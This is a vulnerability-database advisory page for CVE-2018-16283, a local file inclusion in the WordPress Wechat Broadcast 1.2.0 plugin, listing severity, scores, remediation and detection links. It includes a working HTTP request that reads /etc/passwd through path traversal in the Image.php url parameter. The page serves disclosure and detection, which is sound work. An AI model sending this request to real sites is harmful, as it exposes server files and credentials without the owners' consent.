🔙 목록으로 돌아가기

CVE-2018-16283: WordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion

TitleWordPress Plugin Wechat Broadcast 1.2.0 - Local File Inclusion
Author0x240x23elu
SeverityCritical
ImpactUnauthenticated attackers can read arbitrary files on the WordPress server through directory traversal in the Image.php url parameter, potentially exposing wp-config.php containing database credentials, private keys, and other sensitive configuration files.
RemediationUpdate to the latest version of the WordPress Plugin Wechat Broadcast or apply the patch provided by the vendor to fix the LFI vulnerability.
CVSS Score9.8
EPSS Score0.77894
CVE IDCVE-2018-16283
CWE IDCWE-22
Tags cve cve2018 edb seclists wordpress wp-plugin lfi wechat_brodcast_project vuln

🔍 Vulnerability Description

WordPress Wechat Broadcast plugin 1.2.0 and earlier allows Directory Traversal via the Image.php url parameter.

🌐 HTTP Request

GET /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-16283.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-16283.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A